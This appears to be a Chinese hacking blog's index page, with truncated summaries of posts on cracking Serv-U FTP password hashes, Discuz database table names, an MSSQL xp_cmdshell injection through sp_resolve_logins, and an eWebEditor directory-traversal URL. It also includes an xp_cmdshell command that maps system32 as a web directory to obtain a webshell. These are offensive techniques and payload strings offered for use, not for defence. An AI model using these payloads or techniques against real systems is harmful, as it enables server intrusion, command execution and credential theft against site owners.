摘要：方法一：爆破法． 最显眼的要属用户名和密码了，关键是如何破密码呢？到网上搜了一个专门破SERV-U密码的工具（Serv-UPassCrack1.0a.rar），太慢了，这要等到何年何月啊！干脆用记事本打开它的脚本crack.vbs．看看解密原理：假设原来明文密码用"password_mingwen"表示，密文密码也就是 我们在ServUDaemon.ini中看到的密码（34位），用"pa... 阅读全文

摘要：cdb_access 用户权限表 cdb_adminactions 管理动作表 cdb_admingroups 管理组数据表 cdb_adminnotes 管理员留言 cdb_adminsessions 管理员后台在线记录 cdb_advertisements 广告资料表 c... 阅读全文

摘要：Neeao：此漏洞鸡肋之极，甚至没一点用处，不过重要的还是疯子锲而不舍的不断追求的这种精神。什么时候也能有空去读一些代码去。 我看到MSSQL的存储过程中，有模有样的在过滤。 然后我就去读读他们的存储过程。就找到了一个注入而已。 疯子如是说。 漏洞资料如下： master..sp_resolve_logins存储过程中，对@dest_path参数过滤不严，导致xp_cmdshell注入。 分... 阅读全文

摘要：ewebeditor/admin_uploadfile.asp?id=14 在id=14后面添加&dir=.. 再加 &dir=../.. &dir=http://www.cnblogs.com/../.. 看到整个网站文件了 阅读全文

摘要：我们很多情况下都遇到SQL注入可以列目录和运行命令，但是却很不容易找到web所在目录，也就不好得到一个webshell，这一招不错： exec master.dbo.xp_cmdshell ’cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"’ 建立虚拟目... 阅读全文